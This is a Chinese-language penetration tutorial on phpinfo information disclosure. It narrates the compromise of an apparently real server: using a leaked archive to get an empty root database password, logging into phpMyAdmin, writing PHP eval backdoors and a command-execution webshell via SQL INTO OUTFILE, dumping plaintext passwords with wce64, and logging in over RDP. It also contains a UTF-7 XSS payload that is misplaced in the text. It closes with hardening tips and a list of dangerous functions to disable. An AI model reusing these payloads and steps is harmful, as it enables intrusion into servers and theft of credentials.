PHPInfo函數(shù)信息泄露漏洞常發(fā)生一些默認(rèn)的安裝包，比如phpstudy等，默認(rèn)安裝完成后，沒(méi)有及時(shí)刪除這些提供環(huán)境測(cè)試的文件，比較常見(jiàn)的為phpinfo.php、1.php和test.php，雖然通過(guò)phpinfo獲取的php環(huán)境以及變量等信息，但這些信息的泄露配合一些其它漏洞將有可能導(dǎo)致系統(tǒng)被滲透和提權(quán)。

1.1phpinfo函數(shù)

PHP中提供了PHPInfo()函數(shù)，該函數(shù)返回 PHP 的所有信息，包括了 PHP 的編譯選項(xiàng)及擴(kuò)充配置、PHP 版本、服務(wù)器信息及環(huán)境變量、PHP 環(huán)境變量、操作系統(tǒng)版本信息、路徑及環(huán)境變量配置、HTTP 標(biāo)頭、及版權(quán)宣告等信息。其函數(shù)定義如下：

語(yǔ)法: int phpinfo(void);

返回值: 整數(shù)

函數(shù)種類(lèi): PHP 系統(tǒng)功能

例如新建一個(gè)php文件，在其中輸入以下內(nèi)容：

<?php phpinfo(); ?> 

1.2phpinfo信息泄露

該函數(shù)主要用于網(wǎng)站建設(shè)過(guò)程中測(cè)試搭建的PHP環(huán)境是否正確，很多網(wǎng)站在測(cè)試完畢后并沒(méi)有及時(shí)刪除，因此當(dāng)訪問(wèn)這些測(cè)試頁(yè)面時(shí)，會(huì)輸出服務(wù)器的關(guān)鍵信息，這些信息的泄露將導(dǎo)致服務(wù)器被滲透的風(fēng)險(xiǎn)。

<html>
 <head> 
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> 
</head> 
<body> 
<iframe src="http://域名/phpinfo.php? ADw-SCRIPT AD4-alert(document.domain); ADw-/SCRIPT AD4-=1"> 

1.3一個(gè)有phpinfo泄露滲透的實(shí)例

1.分析phpinfo函數(shù)暴露出來(lái)的有用信息

從網(wǎng)站phpInfo.php程序運(yùn)行的結(jié)果中我們可以獲取以下有用的信息：

(1)操作系統(tǒng)為Windows2008 Server或者Windows7： Windows NT BNKUMDFI 6.1 build 7601

(2)服務(wù)器使用了Apache 2.4，這意味著如果拿到Webshell后99%可以提權(quán)成功，Apache在Windows環(huán)境下權(quán)限極高，默認(rèn)為System權(quán)限。

(3)網(wǎng)站默認(rèn)路徑：D:/WWW 通過(guò)mssql或者mysql直接導(dǎo)入一句話需要知道網(wǎng)站真實(shí)路徑，這個(gè)出來(lái)就很好辦了。

圖1獲取有用信息

2.查看泄露文件

對(duì)根目錄進(jìn)行訪問(wèn)，如圖2所示，發(fā)現(xiàn)有mail.rar以及三個(gè)文件目錄，其中有一個(gè)phpMyAdmin，這個(gè)是mysql的php管理，有這個(gè)只要獲取數(shù)據(jù)庫(kù)密碼即可導(dǎo)入導(dǎo)出數(shù)據(jù)，包括導(dǎo)出一句話后門(mén)。對(duì)其中的壓縮文件進(jìn)行下載，并查看其中的數(shù)據(jù)庫(kù)配置文件。

圖2查看泄露的其它文件

3.獲取數(shù)據(jù)庫(kù)口令

在mail文件夾下，發(fā)現(xiàn)數(shù)據(jù)庫(kù)連接文件為connect.php文件，打開(kāi)后獲取數(shù)據(jù)庫(kù)的用戶和密碼，數(shù)據(jù)庫(kù)用戶為root，密碼為空。

圖3獲取數(shù)據(jù)庫(kù)用戶帳號(hào)和密碼

4.連接并查看數(shù)據(jù)庫(kù)

如圖4所示，在瀏覽器中打開(kāi)http://183.***.160.***:5555/phpMyAdmin/，輸入剛才獲取的帳號(hào)，直接登錄，登錄后可以查看其所有數(shù)據(jù)庫(kù)。

圖4登錄并查看數(shù)據(jù)庫(kù)

5.導(dǎo)出一句話后門(mén)到服務(wù)器

目前導(dǎo)出一句話后門(mén)的方法有以下幾種：

(1)創(chuàng)建表方式

CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL );  
INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES ('<?php @eval($_POST[pass]);?>');  
SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE 'd:/www/exehack.php';  
DROP TABLE IF EXISTS `darkmoon`;  

上面代碼是在mysql數(shù)據(jù)庫(kù)中創(chuàng)建darkmoon表，然后加入一個(gè)名字為darkmoon1的字段，并在darkmoon1的字段中插入一句話代碼，然后從darkmoon1字段里面導(dǎo)出一句話到網(wǎng)站的真實(shí)路徑“d:/www/exehack.php”，最后就是刪除darkmoon這個(gè)表，執(zhí)行效果如圖5所示。

圖5執(zhí)行導(dǎo)出一句話sql腳本程序

注意：在使用以上代碼時(shí)必須選擇mysql數(shù)據(jù)庫(kù)，并在phpMyAdmin中選擇SQL，然后執(zhí)行以上代碼即可。需要修改的地方是網(wǎng)站的真實(shí)路徑和文件名稱(chēng)“d:/www/exehack.php”

(2)直接導(dǎo)出一句話后門(mén)文件

select '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/www/p.php' 

如果顯示結(jié)果類(lèi)似“您的 SQL 語(yǔ)句已成功運(yùn)行 ( 查詢花費(fèi) 0.0006 秒 )”表明后門(mén)文件生成成功。

(3)直接執(zhí)行命令權(quán)限的shell

select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'd:/www/cmd.php' 

該方法導(dǎo)出成功后可以直接執(zhí)行DOS命令，使用方法:www.xxx.com/cmd.php?cmd=(cmd=后面直接執(zhí)行dos命令)，如圖6所示。

圖6導(dǎo)入可以執(zhí)行命令的webshell

6.獲取webshell

對(duì)導(dǎo)出的webshell在網(wǎng)站進(jìn)行訪問(wèn)測(cè)試，如圖7所示，如果沒(méi)有顯示錯(cuò)誤，則表示可以運(yùn)行，在中國(guó)菜刀一句話后門(mén)管理中添加該地址直接獲取webshell，如圖8所示。

圖7測(cè)試導(dǎo)出的webshell

圖8獲取webshell

7.服務(wù)器提權(quán)

通過(guò)中國(guó)菜刀隊(duì)遠(yuǎn)程終端命令，直接在其中執(zhí)行命令，如圖9所示，可以查看是否開(kāi)啟3389端口，系統(tǒng)當(dāng)前用戶的權(quán)限是系統(tǒng)權(quán)限，查看當(dāng)前都有什么用戶。上傳wce64.exe并執(zhí)行“wce64 -w”獲取當(dāng)前登錄明文密碼。

圖9執(zhí)行命令

圖10獲取系統(tǒng)管理員密碼

8.登錄3389

在本地打開(kāi)mstsc.exe直接輸入用戶名和密碼進(jìn)行登錄，如圖11所示成功登錄該服務(wù)器。

圖10成功登錄該服務(wù)器

9.總結(jié)

系統(tǒng)一個(gè)小小的失誤，再加上一些偶然的因素，就導(dǎo)致一個(gè)系統(tǒng)被滲透，并獲取了服務(wù)器權(quán)限，因此phpinfo.php信息泄露不可忽略。phpinfo信息泄露還可以進(jìn)行跨站攻擊，將以下代碼保存為1.html.

10.防范方法

(1)通過(guò)修改服務(wù)器環(huán)境內(nèi)php.ini文件，將“expose_php = On”修改成“expose_php = Off”然后重啟php即可。

(2)如果確實(shí)需要該測(cè)試信息，在測(cè)試時(shí)使用，測(cè)試完畢后將該文件刪除掉。

(3)若無(wú)需要可以將一些php的危險(xiǎn)函數(shù)禁用，打開(kāi)/etc/php.ini文件，查找到 disable_functions，添加需禁用的以下函數(shù)名：

phpinfo,eval,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,

proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,

symlink,popepassthru,stream_socket_server,fsocket,fsockopen